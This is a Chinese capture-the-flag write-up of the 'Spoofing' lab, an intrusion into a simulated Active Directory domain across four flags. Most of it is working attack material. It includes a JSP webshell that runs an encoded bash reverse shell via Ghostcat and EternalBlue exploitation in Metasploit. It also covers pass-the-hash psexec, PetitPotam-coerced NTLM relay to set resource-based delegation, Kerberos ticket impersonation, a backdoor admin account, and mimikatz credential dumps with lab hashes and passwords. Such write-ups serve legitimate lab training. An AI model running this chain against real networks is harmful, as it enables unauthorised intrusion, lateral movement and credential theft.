春秋云境 Spoofing WP
Spoofing是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
知识点如下:
- Tomcat
- NTLM
- WebClient
- Coerce Authentication
- noPac
flag01
首先fscan扫描
这里看到8009端口,想到之前复现过的Tomcat幽灵猫漏洞,博客地址https://blog.csdn.net/m0_62466350/article/details/130568199?spm=1001.2014.3001.5501,还自己改了一下利用脚本,地址:https://github.com/fdxsec/tomcat_Ghostcat/tree/main
这里先读取配置文件WEB-INF/web.xml,配置文件如下:
Getting resource at ajp13://39.98.116.236:8009/
----------------------------
<!DOCTYPE web-app PUBLIC
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
"http://java.sun.com/dtd/web-app_2_3.dtd" >
<web-app>
<display-name>Archetype Created Web Application</display-name>
<security-constraint>
<display-name>Tomcat Server Configuration Security Constraint</display-name>
<web-resource-collection>
<web-resource-name>Protected Area</web-resource-name>
<url-pattern>/upload/*</url-pattern>
</web-resource-collection>
<auth-constraint>
<role-name>admin</role-name>
</auth-constraint>
</security-constraint>
<error-page>
<error-code>404</error-code>
<location>/404.html</location>
</error-page>
<error-page>
<error-code>403</error-code>
<location>/error.html</location>
</error-page>
<error-page>
<exception-type>java.lang.Throwable</exception-type>
<location>/error.html</location>
</error-page>
<servlet>
<servlet-name>HelloServlet</servlet-name>
<servlet-class>com.example.HelloServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>HelloServlet</servlet-name>
<url-pattern>/HelloServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>LoginServlet</display-name>
<servlet-name>LoginServlet</servlet-name>
<servlet-class>com.example.LoginServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>LoginServlet</servlet-name>
<url-pattern>/LoginServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>RegisterServlet</display-name>
<servlet-name>RegisterServlet</servlet-name>
<servlet-class>com.example.RegisterServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>RegisterServlet</servlet-name>
<url-pattern>/RegisterServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>UploadTestServlet</display-name>
<servlet-name>UploadTestServlet</servlet-name>
<servlet-class>com.example.UploadTestServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>UploadTestServlet</servlet-name>
<url-pattern>/UploadServlet</url-pattern>
</servlet-mapping>
<servlet>
<display-name>DownloadFileServlet</display-name>
<servlet-name>DownloadFileServlet</servlet-name>
<servlet-class>com.example.DownloadFileServlet</servlet-class>
</servlet>
<servlet-mapping>
<servlet-name>DownloadFileServlet</servlet-name>
<url-pattern>/DownloadServlet</url-pattern>
</servlet-mapping>
</web-app>
这里得到了很多接口,挨个尝试发现/UploadServlet是个文件上传的接口,并且会回显路径,那么利用幽灵猫漏洞打文件包含可以getshell。
上传文件内容如下,主要内容就是反弹shell:
<%
java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,反弹shell的编码}|{base64,-d}|{bash,-i}").getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>
这里修改一下脚本参数
进行利用
成功回显
拿到flag01
flag02
老规矩,上传fscan和fscan进行内网扫描,fscan的扫描结果如下:
./fscan_amd64 -h 172.22.11.0/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.2
start infoscan
(icmp) Target 172.22.11.6 is alive
(icmp) Target 172.22.11.26 is alive
(icmp) Target 172.22.11.45 is alive
(icmp) Target 172.22.11.76 is alive
[*] Icmp alive hosts len is: 4
172.22.11.26:135 open
172.22.11.6:88 open
172.22.11.76:8080 open
172.22.11.6:135 open
172.22.11.45:445 open
172.22.11.26:445 open
172.22.11.6:445 open
172.22.11.26:139 open
172.22.11.45:139 open
172.22.11.6:139 open
172.22.11.45:135 open
172.22.11.76:22 open
172.22.11.76:8009 open
[*] alive ports len is: 13
start vulscan
[*] NetBios: 172.22.11.26 XIAORANG\XR-LCM3AE8B
[*] NetInfo:
[*]172.22.11.6
[->]XIAORANG-DC
[->]172.22.11.6
[*] NetBios: 172.22.11.6 [+]DC XIAORANG\XIAORANG-DC
[+] 172.22.11.45 MS17-010 (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetBios: 172.22.11.45 XR-DESKTOP.xiaorang.lab Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] NetInfo:
[*]172.22.11.26
[->]XR-LCM3AE8B
[->]172.22.11.26
[*] WebTitle: http://172.22.11.76:8080 code:200 len:7091 title:后台管理
四台机器,这里简单分析一下:
- 172.22.11.76 已经拿下
- 172.22.11.45 XR-DESKTOP.xiaorang.lab MS17-010
- 172.22.11.26 XIAORANG\XR-LCM3AE8B
- 172.22.11.6 XIAORANG\XIAORANG-DC
先打172.22.11.45的MS17-010永恒之蓝,这里可以多尝试几个常见的端口,比如1433、80、3306,有一点偶然性。
proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/meterpreter/bind_tcp
show options
set rhosts 172.22.11.45
set lport 1433
run
上线msf的截图忘了截,这里把获取的hash贴出来了:
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
load wiki
creds_all
msv credentials
===============
Username Domain NTLM SHA1
-------- ------ ---- ----
XR-DESKTOP$ XIAORANG 0498507a97312f834d671acdc616ba9d d12705c4431473386ce8a5a7942a3beffda04f40
yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbda91841 6b2838f81b57faed5d860adaf9401b0edb269a6f
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
XR-DESKTOP$ XIAORANG 16 f7 4a 18 81 b1 b6 3b 49 97 df 74 01 76 64 cd 5d 93 96 c6 4f 65 bb 9e 32 cf 6c 6d 60 09 fb ed 0e 71
8e 15 fd 4f 72 04 32 47 9d 62 d7 a6 b7 61 67 c7 ee 7e 89 1d b8 d3 9f ec de 9a 30 da 26 0d b3 3f ec 70
33 de 47 95 fa b9 3b c6 a1 f2 7b 6e 74 48 49 2f a1 ce 0f 58 8a 27 fe b9 b7 12 c9 42 63 ee bb b7 8a 31
cf f1 e7 c3 ed b3 ab a7 36 19 34 9d 3e 4a bb 63 72 c4 93 e7 7c 3c 3f 1c eb 52 e9 93 21 57 7a 64 39 15
cc 60 d2 9b ca 1b 96 e9 74 b4 2b 3e dc a3 08 41 e3 c6 de 82 6b df f5 b1 d7 93 1e 72 25 74 26 df 89 84
36 04 92 d7 50 e7 dc 9e e5 dc da e7 be 6b fb 73 08 56 d1 4d f5 81 a0 05 03 27 4f ea 7b 82 e4 bb 02 c4
ea 0c 36 da 36 aa 37 0b 21 dd ba 77 21 ad 48 50 48 e6 a2 90 24 6a ac bd 8e 5e 2e 0e 06 0a df 93 00 38
76 49
yangmei XIAORANG xrihGHgoNZQ
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
xr-desktop$ XIAORANG.LAB 16 f7 4a 18 81 b1 b6 3b 49 97 df 74 01 76 64 cd 5d 93 96 c6 4f 65 bb 9e 32 cf 6c 6d 60 09 fb ed 0e
71 8e 15 fd 4f 72 04 32 47 9d 62 d7 a6 b7 61 67 c7 ee 7e 89 1d b8 d3 9f ec de 9a 30 da 26 0d b3 3
f ec 70 33 de 47 95 fa b9 3b c6 a1 f2 7b 6e 74 48 49 2f a1 ce 0f 58 8a 27 fe b9 b7 12 c9 42 63 ee
bb b7 8a 31 cf f1 e7 c3 ed b3 ab a7 36 19 34 9d 3e 4a bb 63 72 c4 93 e7 7c 3c 3f 1c eb 52 e9 93 21
57 7a 64 39 15 cc 60 d2 9b ca 1b 96 e9 74 b4 2b 3e dc a3 08 41 e3 c6 de 82 6b df f5 b1 d7 93 1e 7
2 25 74 26 df 89 84 36 04 92 d7 50 e7 dc 9e e5 dc da e7 be 6b fb 73 08 56 d1 4d f5 81 a0 05 03 27
4f ea 7b 82 e4 bb 02 c4 ea 0c 36 da 36 aa 37 0b 21 dd ba 77 21 ad 48 50 48 e6 a2 90 24 6a ac bd 8e
5e 2e 0e 06 0a df 93 00 38 76 49
xr-desktop$ XIAORANG.LAB (null)
yangmei XIAORANG.LAB xrihGHgoNZQ
这里获取的hash简单总结一下
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
XR-DESKTOP$ XIAORANG 0498507a97312f834d671acdc616ba9d
yangmei XIAORANG 25e42ef4cc0ab6a8ff9e3edbbda91841 明文密码xrihGHgoNZQ
因为msf里面直接shell有点问题,这里直接psexec连上172.22.11.45
proxychains python psexec.py Administrator@172.22.11.45 -hashes aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799
这里拿到flag02
flag03
使用BloodHound进行信息收集
这里的–dns-tcp极其重要,这是制定了dns为域控,要不然他会报错dns查找不到
proxychains python bloodhound.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab --dns-tcp -ns 172.22.11.6 -c all --zip
看大佬的分析
使用Bloodhound收集到的用户名组合获取到的密码/hashes组合爆破,没发现其他新用户
MAQ = 0,加不了计算机
当前LDAP 没 TLS,远程也加不了计算机,impacket的addcomputer有两种方法samr和ldaps。samr受到MAQ = 0的限制,无法添加计算机;ldaps受到 没TLS + MAQ = 0 的限制
域控存在nopac,当前用户yangmei使用nopac没打死,并且对域内computer container没有createchild的ACL
域控存在nopac,当前用户yangmei对当前windows机器xr-desktop没WriteDacl权限,意味着无法修改SamAccountName
域内存在 DFscoerce 和 petitpotam,但是不存在CVE-2019-1040,因此放弃 DFscoerce,优先使用petitpotam
NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)
推荐使用petitpotam,所以我们使用crackmapexec进行信息收集,这里的-M参数可以指定相关的漏洞。
proxychains crackmapexec smb 172.22.11.26 -u yangmei -p xrihGHgoNZQ -M petitpotam
无ADCS + Petitpotam + ntlm中继打法
攻击链:用petitpotam触发存在漏洞且开启了webclient服务的目标,利用petitpotam触发目标访问我们的http中继服务,目标将会使用webclient携带ntlm认证访问我们的中继,并且将其认证中继到ldap,获取到机器账户的身份,以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性,允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)
如果WebClient在目标机器上开启,那么攻击者可以使用强制技术(例如PetitPotam、PrinterBug)来滥用 WebClient 服务,从而强制进行身份验证,后续通过设置基于资源的约束委派等方式来获取目标机器的最高权限。
关于weblcient relay的原理参考:Privilege Escalation - NTLM Relay over HTTP (Webdav),文章的作者也是云境的靶场设计者。
满足条件,目标机器需要开启webclient服务。
我们这里使用webclientservicescanner来进行探测目标机器是否开启webclient服务,可以看到只有172.22.11.26开启了,也就是说目前只能拿下172.22.11.26。
proxychains webclientservicescanner xiaorang.lab/yangmei:xrihGHgoNZQ@172.22.11.6 -no-validation
proxychains webclientservicescanner xiaorang.lab/yangmei:xrihGHgoNZQ@172.22.11.26 -no-validation
中继攻击前言:
- 实战中的中继打法只需要停掉80占用服务,开启端口转发(portfwd,CS在后续版本中添加了rportfwd_local,直接转发到客户端本地)
- 本次演示类似实战的打法,不选择把impacket丢到入口ubuntu上面这种操作
中继攻击环境配置: 端口转发 + 代理我们目前需要把服务器的80,转发到客户端本地的80
我们这里现在本地生成一个密钥对,然后写到入口机的/root/.ssh/authorized_keys
ssh-keygen -b 4096 -C 张三 -N password -f ./zhangsan-k
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDVGIkHsMq2Npj7XCpvaE3XVpN29ZvMTA54aP4I56i1zOzpwlRM64U0MwmQ6mKUA7VHx67IthZ+OetdQ0QpMOkHHaAAfqpBTazKJRTH5roxGOlfSvr8reB6hGzWhyp1/nEuCjZuL+CqAmxUP4NrM5Nyjo23vXNNkiJRUlvenkF2zYh2Q5VPpNv9xeyP5/ORNu8TniyaJw7sJsuUy1b26teRA477r5Mf6bzecF/h9exi6a40+XeCGMv3sFJT5/rd3ZlFn6pZA7XrQkAKqDuW4YAx4vchR3mD300Gaqt8IzxGies52AZcblQb0kHU4Il9CWl7ZE4HwkEjsXK+MdjCYZ55N35ZqjY0Xpjyrktv+Du5BCL0D4Mlznyeqwb2Qiz/H2EhA28PVBx1tvzzxZ/v7gLuWMbXt7KL26QE4oM0LIGXNi0zc8qHyb/pBr0BXVVPMyeTpNqRC5YTXuNM7s/zLQ420R76OsLRyIxfvP4Bvtcapnf/Bi3jv4mHkA5K34dLGpUUwJMT+Tyf9OlbtBnhLTQ5pkOFRqUCrcI5ojSbwj3T/aDP2FbD2caPTgH5anjXfeEt1dPPBR2IQVCWB+dn7sVBj1hz2pZUjHM6KaTTIdSvtJLpZYQRrhoNGAM+43MjonBU/G8M1ZrMNq2iei1jX3OfR6JpG8ujsLhvH4zzWRWqxQ==" >/root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
由于SSH的反向端口转发监听的时候只会监听127.0.0.1,所以这时候需要点技巧如下所示,即反向端口转发79端口指定监听全部 (-R *:79:127.0.0.1:80),端口79依旧绑定在了127.0.0.1(顺便把socks5代理也开了)
- -D 0.0.0.0:1080:这设置了本地的“动态”端口转发。它在你的本地机器上创建了一个SOCKS代理,地址为 0.0.0.0(所有可用的网络接口)和端口为 1080。
- *-R :79:127.0.0.1:80:这设置了远程端口转发。它将远程服务器上的端口 79 的连接转发到你本地机器的 127.0.0.1:80(假设本地端口 80 上有一个服务在运行)。
ssh -i zhangsan-key root@39.99.250.41 -D 0.0.0.0:1080 -R *:79:127.0.0.1:80
再加多一条socat,让流量 0.0.0.0:80 转发到 127.0.0.1:79,再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0
nohup socat TCP-LISTEN:80,fork,bind=0.0.0.0 TCP:localhost:79 &
简单来说就是0.0.0.0:80转发到127.0.0.1:79,然后再将127.0.0.1:99通过ssh转发到客户端的80端口,我们接下来可以验证一下,如图:
nc -lvvp 80
proxychains curl http://172.22.11.76:80
本地开启ntlmrelayx
注意:
- 前面提到,没有ldaps,所以不能使用addcomputer
- 同时在使用proxychains后,ldap://后面只能接dc的ip
- 利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD
proxychains python ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user ‘xr-desktop$’ --delegate-access
使用Petitpotam触发 XR-LCM3AE8B 认证到172.22.11.76 (ubuntu)
proxychains python Petitpotam.py -u yangmei -p ‘xrihGHgoNZQ’ -d xiaorang.lab ubuntu@80/pwn.txt 172.22.11.26
下图可以看到利用成功后ntlmrelayx也提示设置了XR-DESKTOP到172.22.11.26的基于资源的约束委派。
接下来就是通过基于资源的约束委派获取ST票据,然后注入内存、psexec来获取交互式shell。
申请XR-LCM3AE8B CIFS票据。这里的hash是前面抓到的XR-DESKTOP
用户的
h
a
s
h
。(这里有个坑,
X
R
−
D
E
S
K
T
O
P
用户的hash。(这里有个坑,XR-DESKTOP
用户的hash。(这里有个坑,XR−DESKTOP的hash好像会变化,使用第一次msf抓取的hash报错,重新抓取了一遍才好)
proxychains python3 getST.py -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :b9bb639011e05dc7e4df4369e9b4834c xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6
然后本地会生成一个administrator.ccache的票据,绑定一下,然后就是利用这个银票,进行psexec无密码连接
export KRB5CCNAME=administrator@cifs_XR-LCM3AE8B.xiaorang.lab@XIAORANG.LAB.ccache
proxychains python3 psexec.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26 -codec gbk
成功拿到flag03
flag04
这里原本想的是新建一个用户加到管理组,之后远程登陆上去抓密码,但是登陆的时候提示有用户正在远程登录,现在无法登录。
net user test Abcd1234 /add
net localgroup administrators test /add
通过smbclient.py 传 mimikatz
proxychains python3 smbclient.py xiaorang.lab/administrator@XR-LCM3AE8B.xiaorang.lab -k -no-pass -target-ip 172.22.11.26
use C$
cd \windows\temp
put /root/Desktop/mimikatz.exe
然后再回到上面的shell上运行mimikatz
.\mimikatz.exe “privilege::debug” “sekurlsa::logonpasswords” “exit”
抓取的hash如下:
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 748072 (00000000:000b6a28)
Session : RemoteInteractive from 2
User Name : zhanghui
Domain : XIAORANG
Logon Server : XIAORANG-DC
Logon Time : 2024/1/26 15:49:16
SID : S-1-5-21-3598443049-773813974-2432140268-1133
msv :
[00000003] Primary
* Username : zhanghui
* Domain : XIAORANG
* NTLM : 1232126b24cdf8c9bd2f788a9d7c7ed1
* SHA1 : f3b66ff457185cdf5df6d0a085dd8935e226ba65
* DPAPI : 4bfe751ae03dc1517cfb688adc506154
tspkg :
wdigest :
* Username : zhanghui
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : zhanghui
* Domain : XIAORANG.LAB
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 713308 (00000000:000ae25c)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/1/26 15:49:15
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : f87bbea221c346a6578b5e937f207038
* SHA1 : 318380b6fdd4556d540909a5c86a1bf191b2f0f5
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 7e 84 db cc ca 73 03 80 f7 29 81 e8 9a fe 5f f1 22 35 25 bb 96 3a 28 f5 3e e9 e7 09 9f 36 a4 11 b1 77 de a6 77 48 92 8b 49 49 c2 e8 02 16 89 fb 33 bd b5 2a f7 04 62 74 db 1e c3 ba bd 63 f8 b0 d1 ec 46 50 4e 04 38 6d a7 a4 7e 0d 1a 4d 06 5a 73 6e 11 71 11 e2 7f 9b 8e 7f 68 6a 8f 23 6e 38 66 a5 76 95 65 1d 1a 38 24 fc 64 e2 ca 83 c4 87 57 ec 28 eb fe 15 50 c1 55 b2 22 46 1a 2d 7b 50 d0 71 b5 90 86 90 da 4b a8 51 2a 85 9b 38 e0 0f ea 2a 67 18 3c 8d f4 5e 3a 50 2b 57 b3 55 c5 b6 48 5a af 8c 3c f6 f4 09 0e f4 d9 ff f3 3d a2 f7 87 eb 33 02 d3 f9 d1 da b7 ac 37 14 0a 50 cc 3b ca d1 6f 0a c2 a0 73 81 75 65 91 85 95 dd 60 c6 a9 e1 1f 43 9c 4c 81 91 b5 77 ed 2d 28 5d c8 0f 1a 06 c8 89 44 64 65 11 f2 36 37 13 7c ef 8b 56
ssp :
credman :
Authentication Id : 0 ; 712467 (00000000:000adf13)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/1/26 15:49:15
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : 51c8e21728e7792bf4c5973dfc5b9647
* SHA1 : e1878dd2d0da1a0f783d870dd91b63e467c00dcf
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 70 55 dc 5f 91 81 ff 2e 47 0f 0b 46 c3 11 6f 90 ba a9 0c 1d e5 a4 3f d9 48 ac cc 34 f8 fd 18 18 ef 37 cc f4 aa 08 22 f1 65 29 3d 11 e9 08 17 d9 56 fc 11 e9 18 ed f9 af f4 6d bb 1f 9f 9d f3 48 4d 24 27 f1 b7 a8 07 73 e8 c1 32 20 80 5e a1 b6 96 12 99 94 c7 43 be 76 35 f4 ff ea 09 c9 ce 98 e6 da 3c 80 8f ad cf af 83 1a bd a6 60 36 4b 06 9a 29 34 79 7c c1 5d d2 c1 d5 0f fb ab ee 27 7f 6a 2b 88 70 6b 94 83 76 59 f9 47 a1 88 a1 a5 bd 76 2f f4 1a da f6 4f 42 81 79 9c 8b 2f f7 0e 41 99 6e b2 1b e9 84 47 6f fd 39 27 0d 9e 1e 48 b8 8b 2e 7c 14 fc 5d 91 dc fc 82 f2 ea 86 52 8d fd 85 ad 17 38 e3 d0 f0 32 ed d9 13 85 66 c7 32 85 ca 2f d0 8a 78 f6 06 4c 9a b1 a8 fc 86 90 59 08 9d 8d 5b 49 55 13 16 aa 58 49 d5 c2 3b d2 cc 92
ssp :
credman :
Authentication Id : 0 ; 711592 (00000000:000adba8)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2024/1/26 15:49:15
SID : S-1-5-96-0-2
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : 51c8e21728e7792bf4c5973dfc5b9647
* SHA1 : e1878dd2d0da1a0f783d870dd91b63e467c00dcf
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 70 55 dc 5f 91 81 ff 2e 47 0f 0b 46 c3 11 6f 90 ba a9 0c 1d e5 a4 3f d9 48 ac cc 34 f8 fd 18 18 ef 37 cc f4 aa 08 22 f1 65 29 3d 11 e9 08 17 d9 56 fc 11 e9 18 ed f9 af f4 6d bb 1f 9f 9d f3 48 4d 24 27 f1 b7 a8 07 73 e8 c1 32 20 80 5e a1 b6 96 12 99 94 c7 43 be 76 35 f4 ff ea 09 c9 ce 98 e6 da 3c 80 8f ad cf af 83 1a bd a6 60 36 4b 06 9a 29 34 79 7c c1 5d d2 c1 d5 0f fb ab ee 27 7f 6a 2b 88 70 6b 94 83 76 59 f9 47 a1 88 a1 a5 bd 76 2f f4 1a da f6 4f 42 81 79 9c 8b 2f f7 0e 41 99 6e b2 1b e9 84 47 6f fd 39 27 0d 9e 1e 48 b8 8b 2e 7c 14 fc 5d 91 dc fc 82 f2 ea 86 52 8d fd 85 ad 17 38 e3 d0 f0 32 ed d9 13 85 66 c7 32 85 ca 2f d0 8a 78 f6 06 4c 9a b1 a8 fc 86 90 59 08 9d 8d 5b 49 55 13 16 aa 58 49 d5 c2 3b d2 cc 92
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2024/1/26 15:45:47
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 59597 (00000000:0000e8cd)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/1/26 15:45:47
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : f87bbea221c346a6578b5e937f207038
* SHA1 : 318380b6fdd4556d540909a5c86a1bf191b2f0f5
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 7e 84 db cc ca 73 03 80 f7 29 81 e8 9a fe 5f f1 22 35 25 bb 96 3a 28 f5 3e e9 e7 09 9f 36 a4 11 b1 77 de a6 77 48 92 8b 49 49 c2 e8 02 16 89 fb 33 bd b5 2a f7 04 62 74 db 1e c3 ba bd 63 f8 b0 d1 ec 46 50 4e 04 38 6d a7 a4 7e 0d 1a 4d 06 5a 73 6e 11 71 11 e2 7f 9b 8e 7f 68 6a 8f 23 6e 38 66 a5 76 95 65 1d 1a 38 24 fc 64 e2 ca 83 c4 87 57 ec 28 eb fe 15 50 c1 55 b2 22 46 1a 2d 7b 50 d0 71 b5 90 86 90 da 4b a8 51 2a 85 9b 38 e0 0f ea 2a 67 18 3c 8d f4 5e 3a 50 2b 57 b3 55 c5 b6 48 5a af 8c 3c f6 f4 09 0e f4 d9 ff f3 3d a2 f7 87 eb 33 02 d3 f9 d1 da b7 ac 37 14 0a 50 cc 3b ca d1 6f 0a c2 a0 73 81 75 65 91 85 95 dd 60 c6 a9 e1 1f 43 9c 4c 81 91 b5 77 ed 2d 28 5d c8 0f 1a 06 c8 89 44 64 65 11 f2 36 37 13 7c ef 8b 56
ssp :
credman :
Authentication Id : 0 ; 59577 (00000000:0000e8b9)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2024/1/26 15:45:47
SID : S-1-5-90-0-1
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : 51c8e21728e7792bf4c5973dfc5b9647
* SHA1 : e1878dd2d0da1a0f783d870dd91b63e467c00dcf
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
* Password : 70 55 dc 5f 91 81 ff 2e 47 0f 0b 46 c3 11 6f 90 ba a9 0c 1d e5 a4 3f d9 48 ac cc 34 f8 fd 18 18 ef 37 cc f4 aa 08 22 f1 65 29 3d 11 e9 08 17 d9 56 fc 11 e9 18 ed f9 af f4 6d bb 1f 9f 9d f3 48 4d 24 27 f1 b7 a8 07 73 e8 c1 32 20 80 5e a1 b6 96 12 99 94 c7 43 be 76 35 f4 ff ea 09 c9 ce 98 e6 da 3c 80 8f ad cf af 83 1a bd a6 60 36 4b 06 9a 29 34 79 7c c1 5d d2 c1 d5 0f fb ab ee 27 7f 6a 2b 88 70 6b 94 83 76 59 f9 47 a1 88 a1 a5 bd 76 2f f4 1a da f6 4f 42 81 79 9c 8b 2f f7 0e 41 99 6e b2 1b e9 84 47 6f fd 39 27 0d 9e 1e 48 b8 8b 2e 7c 14 fc 5d 91 dc fc 82 f2 ea 86 52 8d fd 85 ad 17 38 e3 d0 f0 32 ed d9 13 85 66 c7 32 85 ca 2f d0 8a 78 f6 06 4c 9a b1 a8 fc 86 90 59 08 9d 8d 5b 49 55 13 16 aa 58 49 d5 c2 3b d2 cc 92
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : XR-LCM3AE8B$
Domain : XIAORANG
Logon Server : (null)
Logon Time : 2024/1/26 15:45:47
SID : S-1-5-20
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : 51c8e21728e7792bf4c5973dfc5b9647
* SHA1 : e1878dd2d0da1a0f783d870dd91b63e467c00dcf
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : xr-lcm3ae8b$
* Domain : XIAORANG.LAB
* Password : 70 55 dc 5f 91 81 ff 2e 47 0f 0b 46 c3 11 6f 90 ba a9 0c 1d e5 a4 3f d9 48 ac cc 34 f8 fd 18 18 ef 37 cc f4 aa 08 22 f1 65 29 3d 11 e9 08 17 d9 56 fc 11 e9 18 ed f9 af f4 6d bb 1f 9f 9d f3 48 4d 24 27 f1 b7 a8 07 73 e8 c1 32 20 80 5e a1 b6 96 12 99 94 c7 43 be 76 35 f4 ff ea 09 c9 ce 98 e6 da 3c 80 8f ad cf af 83 1a bd a6 60 36 4b 06 9a 29 34 79 7c c1 5d d2 c1 d5 0f fb ab ee 27 7f 6a 2b 88 70 6b 94 83 76 59 f9 47 a1 88 a1 a5 bd 76 2f f4 1a da f6 4f 42 81 79 9c 8b 2f f7 0e 41 99 6e b2 1b e9 84 47 6f fd 39 27 0d 9e 1e 48 b8 8b 2e 7c 14 fc 5d 91 dc fc 82 f2 ea 86 52 8d fd 85 ad 17 38 e3 d0 f0 32 ed d9 13 85 66 c7 32 85 ca 2f d0 8a 78 f6 06 4c 9a b1 a8 fc 86 90 59 08 9d 8d 5b 49 55 13 16 aa 58 49 d5 c2 3b d2 cc 92
ssp :
credman :
Authentication Id : 0 ; 30251 (00000000:0000762b)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2024/1/26 15:45:46
SID : S-1-5-96-0-1
msv :
[00000003] Primary
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* NTLM : 51c8e21728e7792bf4c5973dfc5b9647
* SHA1 : e1878dd2d0da1a0f783d870dd91b63e467c00dcf
tspkg :
wdigest :
* Username : XR-LCM3AE8B$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : XR-LCM3AE8B$
* Domain : xiaorang.lab
